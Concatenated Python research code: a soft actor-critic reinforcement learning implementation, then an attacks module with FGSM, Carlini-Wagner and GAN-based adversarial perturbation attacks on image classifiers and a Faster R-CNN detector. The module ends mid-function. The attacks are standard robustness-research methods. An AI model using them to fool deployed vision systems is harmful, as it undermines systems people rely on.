#### File: FloRL/pytorch-soft-actor-critic/sac.py
```python
import sys
import os
import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.optim import Adam
from utils import soft_update, hard_update
from model import GaussianPolicy, ExponentialPolicy, LogNormalPolicy, LaplacePolicy, QNetwork, ValueNetwork, DeterministicPolicy
from flows import *
import ipdb
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class SAC(object):
def __init__(self, num_inputs, action_space, args):
self.num_inputs = num_inputs
self.action_space = action_space.shape[0]
self.gamma = args.gamma
self.tau = args.tau
self.clip = args.clip
self.policy_type = args.policy
self.target_update_interval = args.target_update_interval
self.automatic_entropy_tuning = args.automatic_entropy_tuning
self.critic = QNetwork(self.num_inputs, self.action_space,\
args.hidden_size).to(device)
self.critic_optim = Adam(self.critic.parameters(), lr=args.lr)
self.alpha = args.alpha
self.tanh = args.tanh
self.reparam = args.reparam
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
# Target Entropy = −dim(A) (e.g. , -6 for HalfCheetah-v2) as given in the paper
if self.automatic_entropy_tuning == True:
self.target_entropy = -torch.prod(torch.Tensor(action_space.shape)).item()
self.log_alpha = torch.zeros(1, requires_grad=True).to(device)
self.alpha_optim = Adam([self.log_alpha], lr=args.lr)
else:
pass
if self.policy_type == "Gaussian":
self.policy = GaussianPolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
elif self.policy_type == "Exponential":
self.policy = ExponentialPolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
elif self.policy_type == "LogNormal":
self.policy = LogNormalPolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
elif self.policy_type == "Laplace":
self.policy = LaplacePolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
self.policy_optim = Adam(self.policy.parameters(), lr=args.lr,weight_decay=1e-6)
self.value = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_target = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_optim = Adam(self.value.parameters(), lr=args.lr)
hard_update(self.value_target, self.value)
elif self.policy_type == "Flow":
if args.flow_model == 'made':
self.policy = MADE(self.action_space,self.num_inputs,args.hidden_size,
args.n_hidden, args.cond_label_size,
args.activation_fn,
args.input_order).to(device)
elif args.flow_model == 'mademog':
assert args.n_components > 1, 'Specify more than 1 component for mixture of gaussians models.'
self.policy = MADEMOG(args.n_components, self.num_inputs,
self.action_space, args.flow_hidden_size,
args.n_hidden, args.cond_label_size,
args.activation_fn,
args.input_order).to(device)
elif args.flow_model == 'maf':
self.policy = MAF(args.n_blocks,self.num_inputs,self.action_space,
args.flow_hidden_size, args.n_hidden,
args.cond_label_size, args.activation_fn,
args.input_order, batch_norm=not
args.no_batch_norm).to(device)
elif args.flow_model == 'mafmog':
assert args.n_components > 1, 'Specify more than 1 component for mixture of gaussians models.'
self.policy = MAFMOG(args.n_blocks,self.num_inputs,args.n_components,
self.action_space, args.flow_hidden_size,
args.n_hidden, args.cond_label_size,
args.activation_fn,args.input_order,
batch_norm=not
args.no_batch_norm).to(device)
elif args.flow_model =='realnvp':
self.policy = RealNVP(args.n_blocks,self.num_inputs,self.action_space,
args.flow_hidden_size,args.n_hidden,
args.cond_label_size,batch_norm=not
args.no_batch_norm).to(device)
elif args.flow_model =='planar':
self.policy = PlanarBase(args.n_blocks,self.num_inputs,self.action_space,
args.flow_hidden_size,args.n_hidden,device).to(device)
else:
raise ValueError('Unrecognized model.')
self.policy_optim = Adam(self.policy.parameters(), lr=args.lr, weight_decay=1e-6)
self.value = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_target = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_optim = Adam(self.value.parameters(), lr=args.lr)
hard_update(self.value_target, self.value)
else:
self.policy = DeterministicPolicy(self.num_inputs, self.action_space, args.hidden_size)
self.policy_optim = Adam(self.policy.parameters(), lr=args.lr)
self.critic_target = QNetwork(self.num_inputs, self.action_space,\
args.hidden_size).to(device)
hard_update(self.critic_target, self.critic)
def select_action(self, state, eval=False):
state = torch.FloatTensor(state).to(device).unsqueeze(0)
if eval == False:
self.policy.train()
if len(state.size()) > 2:
state = state.view(-1,self.num_inputs)
action, _, _, _, _ = self.policy(state, reparam = self.reparam)
else:
self.policy.eval()
if len(state.size()) > 2:
state = state.view(-1,self.num_inputs)
if self.policy_type != 'Flow':
_, _, _, action, _ = self.policy(state, reparam=self.reparam)
else:
_, _, _, action, _ = self.policy.inverse(state)
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
if self.tanh:
action = torch.tanh(action)
elif self.policy_type == "Flow":
if self.tanh:
action = torch.tanh(action)
else:
pass
action = action.detach().cpu().numpy()
return action[0]
def update_parameters(self, state_batch, action_batch, reward_batch, next_state_batch, mask_batch, updates):
state_batch = torch.FloatTensor(state_batch).to(device)
next_state_batch = torch.FloatTensor(next_state_batch).to(device)
action_batch = torch.FloatTensor(action_batch).to(device)
reward_batch = torch.FloatTensor(reward_batch).to(device).unsqueeze(1)
mask_batch = torch.FloatTensor(np.float32(mask_batch)).to(device).unsqueeze(1)
"""
Use two Q-functions to mitigate positive bias in the policy improvement step that is known
to degrade performance of value based methods. Two Q-functions also significantly speed
up training, especially on harder task.
"""
expected_q1_value, expected_q2_value = self.critic(state_batch, action_batch)
if self.policy_type == 'Flow':
new_action, log_prob, _, mean, log_std = self.policy.inverse(state_batch)
else:
new_action, log_prob, _, mean, log_std = self.policy(state_batch, reparam=self.reparam)
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace" or self.policy_type == 'Flow':
if self.automatic_entropy_tuning:
"""
Alpha Loss
"""
alpha_loss = -(self.log_alpha * (log_prob + self.target_entropy).detach()).mean()
self.alpha_optim.zero_grad()
alpha_loss.backward()
self.alpha_optim.step()
self.alpha = self.log_alpha.exp()
alpha_logs = self.alpha.clone() # For TensorboardX logs
else:
alpha_loss = torch.tensor(0.)
alpha_logs = self.alpha # For TensorboardX logs
"""
Including a separate function approximator for the soft value can stabilize training.
"""
expected_value = self.value(state_batch)
target_value = self.value_target(next_state_batch)
next_q_value = reward_batch + mask_batch * self.gamma * (target_value).detach()
else:
"""
There is no need in principle to include a separate function approximator for the state value.
We use a target critic network for deterministic policy and eradicate the value value network completely.
"""
alpha_loss = torch.tensor(0.)
alpha_logs = self.alpha # For TensorboardX logs
next_state_action, _, _, _, _, = self.policy(next_state_batch, reparam =self.reparam)
target_critic_1, target_critic_2 = self.critic_target(next_state_batch, next_state_action)
target_critic = torch.min(target_critic_1, target_critic_2)
next_q_value = reward_batch + mask_batch * self.gamma * (target_critic).detach()
"""
Soft Q-function parameters can be trained to minimize the soft Bellman residual
JQ = 𝔼(st,at)~D[0.5(Q1(st,at) - r(st,at) - γ(𝔼st+1~p[V(st+1)]))^2]
∇JQ = ∇Q(st,at)(Q(st,at) - r(st,at) - γV(target)(st+1))
"""
q1_value_loss = F.mse_loss(expected_q1_value, next_q_value)
q2_value_loss = F.mse_loss(expected_q2_value, next_q_value)
q1_new, q2_new = self.critic(state_batch, new_action)
expected_new_q_value = torch.min(q1_new, q2_new)
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace" or self.policy_type == 'Flow':
"""
Including a separate function approximator for the soft value can stabilize training and is convenient to
train simultaneously with the other networks
Update the V towards the min of two Q-functions in order to reduce overestimation bias from function approximation error.
JV = 𝔼st~D[0.5(V(st) - (𝔼at~π[Qmin(st,at) - α * log π(at|st)]))^2]
∇JV = ∇V(st)(V(st) - Q(st,at) + (α * logπ(at|st)))
"""
next_value = expected_new_q_value - (self.alpha * log_prob)
value_loss = F.mse_loss(expected_value, next_value.detach())
else:
pass
# whether to use reparameterization trick or not
if self.reparam == True:
"""
Reparameterization trick is used to get a low variance estimator
f(εt;st) = action sampled from the policy
εt is an input noise vector, sampled from some fixed distribution
Jπ = 𝔼st∼D,εt∼N[α * logπ(f(εt;st)|st) − Q(st,f(εt;st))]
∇Jπ = ∇log π + ([∇at (α * logπ(at|st)) − ∇at Q(st,at)])∇f(εt;st)
"""
policy_loss = ((self.alpha * log_prob) - expected_new_q_value).mean()
else:
log_prob_target = expected_new_q_value - expected_value
policy_loss = (log_prob * ((self.alpha * log_prob) - log_prob_target).detach() ).mean()
# Regularization Loss
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
mean_loss = 0.001 * mean.pow(2).mean()
std_loss = 0.001 * log_std.pow(2).mean()
policy_loss += mean_loss + std_loss
self.critic_optim.zero_grad()
q1_value_loss.backward()
self.critic_optim.step()
self.critic_optim.zero_grad()
q2_value_loss.backward()
self.critic_optim.step()
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
self.value_optim.zero_grad()
value_loss.backward()
self.value_optim.step()
else:
value_loss = torch.tensor(0.)
self.policy_optim.zero_grad()
policy_loss.backward()
if self.policy_type == 'Exponential' or self.policy_type == "LogNormal" or self.policy_type == "Laplace" or self.policy_type == 'Flow':
torch.nn.utils.clip_grad_norm_(self.policy.parameters(),self.clip)
self.policy_optim.step()
# clip weights of policy network to insure the values don't blow up
for p in self.policy.parameters():
p.data.clamp_(-10*self.clip, 10*self.clip)
"""
We update the target weights to match the current value function weights periodically
Update target parameter after every n(args.target_update_interval) updates
"""
if updates % self.target_update_interval == 0 and self.policy_type == "Deterministic":
soft_update(self.critic_target, self.critic, self.tau)
elif updates % self.target_update_interval == 0 and (self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal"):
soft_update(self.value_target, self.value, self.tau)
# calculate the entropy
with torch.no_grad():
entropy = -(log_prob.mean())
# ipdb.set_trace() #alpha_loss.item()
return value_loss.item(), q1_value_loss.item(), q2_value_loss.item(), policy_loss.item(),entropy, alpha_logs
# Save model parameters
def save_model(self, env_name, suffix="", actor_path=None, critic_path=None, value_path=None):
if not os.path.exists('models/'):
os.makedirs('models/')
if actor_path is None:
actor_path = "models/sac_actor_{}_{}".format(env_name, suffix)
if critic_path is None:
critic_path = "models/sac_critic_{}_{}".format(env_name, suffix)
if value_path is None:
value_path = "models/sac_value_{}_{}".format(env_name, suffix)
print('Saving models to {}, {} and {}'.format(actor_path, critic_path, value_path))
torch.save(self.value.state_dict(), value_path)
torch.save(self.policy.state_dict(), actor_path)
torch.save(self.critic.state_dict(), critic_path)
# Load model parameters
def load_model(self, actor_path, critic_path, value_path):
print('Loading models from {}, {} and {}'.format(actor_path, critic_path, value_path))
if actor_path is not None:
self.policy.load_state_dict(torch.load(actor_path))
if critic_path is not None:
self.critic.load_state_dict(torch.load(critic_path))
if value_path is not None:
self.value.load_state_dict(torch.load(value_path))
``` |
{
"source": "joeybose/simple-faster-rcnn-pytorch",
"score": 3
} |
#### File: joeybose/simple-faster-rcnn-pytorch/attacks.py
```python
import torch
import cv2
from utils import array_tool as at
from data.dataset import preprocess,inverse_normalize
import numpy as np
import ipdb
import pdb
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torch.optim as optim
import sys
def reduce_sum(x, keepdim=True):
for a in reversed(range(1, x.dim())):
x = x.sum(a, keepdim=keepdim)
return x
def L2_dist(x, y):
return reduce_sum((x - y)**2)
def torch_arctanh(x, eps=1e-6):
x = x * (1. - eps)
return (torch.log((1 + x) / (1 - x))) * 0.5
class FGSM(object):
def __init__(self, epsilon=0.25):
self.epsilon = epsilon
def attack(self, inputs, labels, model, *args):
"""
Given a set of inputs and epsilon, return the perturbed inputs (as Variable objects),
the predictions for the inputs from the model, and the percentage of inputs
unsucessfully perturbed (i.e., model accuracy).
The adversarial inputs is a python list of tensors.
The predictions is a numpy array of classes, with length equal to the number of inputs.
"""
adv_inputs = inputs.data + self.epsilon * torch.sign(inputs.grad.data)
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
adv_inputs = Variable(adv_inputs, requires_grad=False)
predictions = torch.max(model(adv_inputs).data, 1)[1].cpu().numpy()
num_unperturbed = (predictions == labels.data.cpu().numpy()).sum()
adv_inputs = [ adv_inputs[i] for i in range(inputs.size(0)) ]
return adv_inputs, predictions, num_unperturbed
class CarliniWagner(object):
def __init__(self, confidence=0, learning_rate=1e-3, binary_search_steps=5, max_iterations=1000,
initial_const=1, num_labels=10, clip_min=-1, clip_max=1, verbose=False):
"""
Return a tensor that constructs adversarial examples for the given input.
Only supports untargeted attacks.
- confidence : Confidence of adversarial examples: higher produces examples
with larger l2 distortion, but more strongly classified as adversarial.
Set to 0 in the paper.
- learning_rate : The learning rate for the attack algorithm. Smaller values produce
better results but are slower to converge.
- binary_search_steps : The number of times we perform binary search to find the
optimal tradeoff-constant between norm of the perturbation and confidence
of the classification.
- max_iterations : The maximum number of iterations. Setting this to a larger value
will produce lower distortion results. Using only a few iterations requires
a larger learning rate, and will produce larger distortion results.
- initial_const : The initial tradeoff-constant to use to tune the relative
importance of size of the perturbation and confidence of classification.
If binary_search_steps is large, the initial constant is not important.
A smaller value of this constant gives lower distortion results.
This is c in the formula in the paper.
- clip_min : Minimum input component value.
- clip_max : Maximum input component value.
- num_labels : Number of classes in the model's output.
- verbose : Print output in detail.
"""
self.confidence = confidence
self.learning_rate = learning_rate
self.initial_const = initial_const
self.num_labels = num_labels
self.binary_search_steps = binary_search_steps
self.repeat = binary_search_steps >= 10
self.max_iterations = max_iterations
# allows early aborts if gradient descent is unable to make progress
self.abort_early = True
self.verbose = verbose
self.clip_min = clip_min
self.clip_max = clip_max
self.cuda = torch.cuda.is_available()
def _compare(self, prediction, label):
"""
Return True if label is not the most likely class.
If there is a prediction for each class, prediction[label] should be at least
self.confidence from being the most likely class.
"""
if not isinstance(prediction, (float, int, np.int64)):
prediction = np.copy(prediction)
prediction[label] += self.confidence
prediction = np.argmax(prediction)
return prediction != label
def _optimize(self, model, optimizer, modifier, inputs, labels, scale_const):
"""
Calculate loss and optimize for modifier here. Return the loss, adversarial inputs,
and predicted classes. Since the attack is untargeted, aim to make label the least
likely class.
modifier is the variable we're optimizing over (w in the paper).
Don't think of it as weights in a NN; there is a unique w for each x in the batch.
"""
inputs_adv = (torch.tanh(modifier + inputs) + 1) * 0.5
inputs_adv = inputs_adv * (self.clip_max - self.clip_min) + self.clip_min
# outputs BEFORE SOFTMAX
predicted = model(inputs_adv)
# before taking the L2 distance between the original and perturbed inputs,
# transform the original inputs in the same way (arctan, then clip)
unmodified = (torch.tanh(inputs) + 1) * 0.5
unmodified = unmodified * (self.clip_max - self.clip_min) + self.clip_min
dist = L2_dist(inputs_adv, unmodified)
loss2 = dist.sum()
# compute probability of label class and maximum other
real = (labels * predicted).sum(1)
other = ((1. - labels) * predicted - labels * 10000.).max(1)[0]
# the greater the likelihood of label, the greater the loss
loss1 = torch.clamp(real - other + self.confidence, min=0.) # equiv to max(..., 0.)
loss1 = torch.sum(scale_const * loss1)
loss = loss1 + loss2
optimizer.zero_grad()
loss.backward()
optimizer.step()
# convert to numpy form before returning it
loss = loss.data.cpu().numpy()[0]
dist = dist.data.cpu().numpy()
predicted = predicted.data.cpu().numpy()
# inputs_adv = inputs_adv.data.permute(0, 2, 3, 1).cpu().numpy()
return loss, dist, predicted, inputs_adv
def attack(self, inputs, labels, model, *args):
"""
Given a set of inputs, labels, and the model, return the perturbed inputs (as Variable objects).
inputs and labels should be Variable objects themselves.
"""
inputs = inputs.clone()
labels = labels.clone()
batch_size = inputs.size(0)
labels = labels.data
# re-scale instances to be within range [0, 1]
input_vars = (inputs.data - self.clip_min) / (self.clip_max - self.clip_min)
input_vars = torch.clamp(input_vars, 0., 1.)
# now convert to [-1, 1]
input_vars = (input_vars * 2) - 1
# convert to tanh-space
input_vars = input_vars * .999999
input_vars = (torch.log((1 + input_vars) / (1 - input_vars))) * 0.5 # arctanh
input_vars = Variable(input_vars, requires_grad=False)
# set the lower and upper bounds accordingly
lower_bound = np.zeros(batch_size)
scale_const = np.ones(batch_size) * self.initial_const
upper_bound = np.ones(batch_size) * 1e10
# numpy placeholders for the overall best l2, most likely label, and adversarial image
o_best_l2 = [1e10] * batch_size
o_best_score = [-1] * batch_size
o_best_attack = inputs.clone()
# one-hot encoding of labels
one_hot_labels = torch.zeros(labels.size() + (self.num_labels,))
if self.cuda: one_hot_labels = one_hot_labels.cuda()
one_hot_labels.scatter_(1, labels.unsqueeze(1), 1.)
label_vars = Variable(one_hot_labels, requires_grad=False)
# setup the modifier variable; this is the variable we are optimizing over
modifier = torch.zeros(inputs.size()).float()
modifier_var = Variable(modifier.cuda() if self.cuda else modifier, requires_grad=True)
optimizer = optim.Adam([modifier_var], lr=self.learning_rate)
for outer_step in range(self.binary_search_steps):
if self.verbose: print '\nsearch step: {0}'.format(outer_step)
best_l2 = [1e10] * batch_size
best_score = [-1] * batch_size
# last iteration (if we run many steps) repeat the search once
if self.repeat and outer_step == self.binary_search_steps - 1:
scale_const = upper_bound
scale_const_tensor = torch.from_numpy(scale_const).float() # .float() needed to conver to FloatTensor
scale_const_var = Variable(scale_const_tensor.cuda() if self.cuda else scale_const_tensor, requires_grad=False)
prev_loss = 1e3 # for early abort
for step in range(self.max_iterations):
loss, dist, predicted, input_adv = self._optimize(model, optimizer, modifier_var,
input_vars, label_vars, scale_const_var)
if step % 10 == 0 or step == self.max_iterations - 1:
if self.verbose: print "Step: {0:>4}, loss: {1:6.6f}, dist: {2:8.6f}, modifier mean: {3:.6e}".format(
step, loss, dist.mean(), modifier_var.data.mean())
# abort early if loss is too small
if self.abort_early and step % (self.max_iterations // 10) == 0:
if loss > prev_loss * 0.9999:
if self.verbose: print 'Aborting early...'
break
prev_loss = loss
# update best result for each image
for i in range(batch_size):
y_hat = np.argmax(predicted[i])
y = labels[i]
# if smaller perturbation and still different predicted class ...
if dist[i] < best_l2[i] and self._compare(y_hat, y):
best_l2[i] = dist[i]
best_score[i] = y_hat
# update overall best results
if dist[i] < o_best_l2[i] and self._compare(y_hat, y):
o_best_l2[i] = dist[i]
o_best_score[i] = y_hat
o_best_attack[i] = input_adv[i]
sys.stdout.flush()
# adjust constants
batch_failure, batch_success = 0, 0
for i in range(batch_size):
if self._compare(best_score[i], labels[i]) and best_score[i] != -1:
# successful, do binary search and divide const by two
upper_bound[i] = min(upper_bound[i], scale_const[i])
if upper_bound[i] < 1e9:
scale_const[i] = (lower_bound[i] + upper_bound[i]) / 2
else:
# failure, multiply by 10 if no solution found
# or do binary search with the known upper bound
lower_bound[i] = max(lower_bound[i], scale_const[i])
upper_bound[i] = (lower_bound[i] + upper_bound[i]) / 2 if (upper_bound[i] < 1e9) else (scale_const[i] * 10)
if self._compare(o_best_score[i], labels[i]) and o_best_score[i] != -1:
batch_success += 1
else:
batch_failure += 1
if self.verbose: print 'failures: {0} successes: {1}'.format(batch_failure, batch_success)
sys.stdout.flush()
# if no good adv attack, then equivalent to using base image
for i in range(len(o_best_score)):
if o_best_score[i] == -1:
o_best_score[i] = labels[i]
o_best_score = np.array(o_best_score)
num_unperturbed = (o_best_score == labels.cpu().numpy()).sum()
return o_best_attack, o_best_score, num_unperturbed
class DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100, cg=0.05, learning_rate=1e-4, train_adv=False):
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
- cg is the normalization constant for perturbation (higher means encourage smaller perturbation)
- learning_rate is learning rate for generator optimizer
- train_adv is whether the model being attacked should be trained adversarially
"""
super(DCGAN, self).__init__()
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=True),
nn.Tanh()
)
self.cuda = torch.cuda.is_available()
if self.cuda:
self.generator.cuda()
self.generator = torch.nn.DataParallel(self.generator, device_ids=range(torch.cuda.device_count()))
cudnn.benchmark = True
# self.criterion = nn.NLLLoss()
self.criterion = nn.CrossEntropyLoss(size_average=False)
self.cg = cg
self.optimizer = optim.Adam(self.generator.parameters(), lr=learning_rate)
self.train_adv = train_adv
self.max_iter = 20
self.c_misclassify = 1
self.confidence = 0
def forward(self, inputs, model, labels=None, bboxes=None, scale=None,\
model_feats=None, model_optimizer=None, *args):
"""
Given a set of inputs, return the perturbed inputs (as Variable objects),
the predictions for the inputs from the model, and the percentage of inputs
unsucessfully perturbed (i.e., model accuracy).
If self.train_adversarial is True, train the model adversarially.
The adversarial inputs is a python list of tensors.
The predictions is a numpy array of classes, with length equal to the number of inputs.
"""
num_unperturbed = 10
iter_count = 0
loss_perturb = 20
loss_misclassify = 10
while loss_misclassify > 0 and loss_perturb > 1:
perturbation = self.generator(inputs)
adv_inputs = inputs + perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
scores,gt_labels = model(adv_inputs,\
bboxes,labels,scale,attack=True)
probs = F.softmax(scores)
suppress_labels,probs,mask = model.faster_rcnn._suppress(None,probs,attack=True)
scores = scores[mask]
gt_labels = gt_labels[mask]
self.optimizer.zero_grad()
try:
one_hot_labels = torch.zeros(gt_labels.size() + (2,))
if self.cuda: one_hot_labels = one_hot_labels.cuda()
one_hot_labels.scatter_(1, gt_labels.unsqueeze(1).data, 1.)
labels_vars = Variable(one_hot_labels, requires_grad=False)
real = (labels_vars * scores).sum(1)
other = ((1. - labels_vars) * scores - labels_vars * 10000.).max(1)[0]
# the greater the likelihood of label, the greater the loss
loss1 = torch.clamp(real - other + self.confidence, min=0.) # equiv to max(..., 0.)
loss_misclassify = self.c_misclassify*torch.sum(loss1)
loss_match = Variable(torch.zeros(1)).cuda()
loss_perturb = self.cg*L2_dist(inputs,adv_inputs)
loss_total = loss_misclassify + loss_perturb
loss_total.backward()
self.optimizer.step()
except:
loss_misclassify = Variable(torch.zeros(1)).cuda()
loss_match = Variable(torch.zeros(1)).cuda()
loss_perturb = self.cg*L2_dist(inputs,adv_inputs)
loss_total = loss_misclassify + loss_perturb
loss_total.backward()
print('Loss NLL is %f, perturb %f, total loss %f' % \
(loss_misclassify.data,loss_perturb.data,loss_total.data))
# optimizer step for the generator
if loss_misclassify.data !=0:
predictions = torch.max(F.log_softmax(scores), 1)[1].cpu().numpy()
num_unperturbed = (predictions == gt_labels).sum()
print("Number of images unperturbed is %d out of %d" % \
(num_unperturbed,len(gt_labels)))
iter_count = iter_count + 1
losses = [Variable(loss_misclassify.data),Variable(torch.zeros(1)).cuda(),Variable(loss_perturb.data)]
losses = losses + [sum(losses)]
if iter_count > self.max_iter:
break
return losses
def perturb(self, inputs, epsilon=1, save_perturb=None):
perturbation = self.generator(inputs)
adv_inputs = inputs + epsilon*perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
if save_perturb is not None:
clamped = torch.clamp(perturbation,-1.0,1.0)
return adv_inputs,clamped
else:
return adv_inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class Inference_DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100, cg=0.05, learning_rate=1e-4, train_adv=False):
"""
Initialize a Inference_DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
- cg is the normalization constant for perturbation (higher means encourage smaller perturbation)
"""
super(Inference_DCGAN, self).__init__()
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=True),
nn.Tanh()
)
self.cuda = torch.cuda.is_available()
if self.cuda:
self.generator.cuda()
self.generator = torch.nn.DataParallel(self.generator, device_ids=range(torch.cuda.device_count()))
cudnn.benchmark = True
def forward(self, inputs, epsilon=1, save_perturb=None):
perturbation = self.generator.module(inputs)
adv_inputs = inputs + epsilon*perturbation
# adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
adv_inputs.clamp(-1.0, 1.0)
if save_perturb is not None:
clamped = torch.clamp(perturbation,-1.0,1.0)
return adv_inputs,clamped
else:
return adv_inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class RPN_attack(nn.Module):
def __init__(self, num_channels=3, ngf=80, cg=0.0005, learning_rate=1e-4, train_adv=False):
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
- cg is the normalization constant for perturbation (higher means encourage smaller perturbation)
- learning_rate is learning rate for generator optimizer
- train_adv is whether the model being attacked should be trained adversarially
"""
super(RPN_attack, self).__init__()
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=False),
nn.Tanh()
)
self.cuda = torch.cuda.is_available()
if self.cuda:
self.generator.cuda()
self.generator = torch.nn.DataParallel(self.generator, device_ids=range(torch.cuda.device_count()))
cudnn.benchmark = True
# self.nll_criterion = nn.NLLLoss(ignore_index=-1)
self.criterion = nn.CrossEntropyLoss(ignore_index=-1)
self.cg = cg
self.optimizer = optim.Adam(self.generator.parameters(), lr=learning_rate)
self.train_adv = train_adv
self.max_iter = 1
self.c_misclassify = 1
def forward(self, inputs, labels, img_size, scale, model, model_optimizer=None, *args):
"""
Given a set of inputs, return the perturbed inputs (as Variable objects),
the predictions for the inputs from the model, and the percentage of inputs
unsucessfully perturbed (i.e., model accuracy).
If self.train_adversarial is True, train the model adversarially.
The adversarial inputs is a python list of tensors.
The predictions is a numpy array of classes, with length equal to the number of inputs.
"""
num_unperturbed = 10
iter_count = 0
while num_unperturbed > 5 and iter_count < self.max_iter:
perturbation = self.generator(inputs)
adv_inputs = inputs + perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
adv_features = model.faster_rcnn.extractor(adv_inputs)
adv_rpn_locs, adv_rpn_scores, adv_rois, adv_roi_indices, anchor = \
model.faster_rcnn.rpn(adv_features, img_size, scale)
# log_probs = F.log_softmax(adv_rpn_scores.squeeze(),dim=1)
# exponent value (p) in the norm needs to be 4 or higher! IMPORTANT!
self.optimizer.zero_grad()
loss_NLL = self.c_misclassify*torch.exp(\
-1*self.criterion(adv_rpn_scores.squeeze(),labels))
loss_match = Variable(torch.zeros(1)).cuda()
loss_perturb = 0.0001 * (torch.norm(perturbation,2))
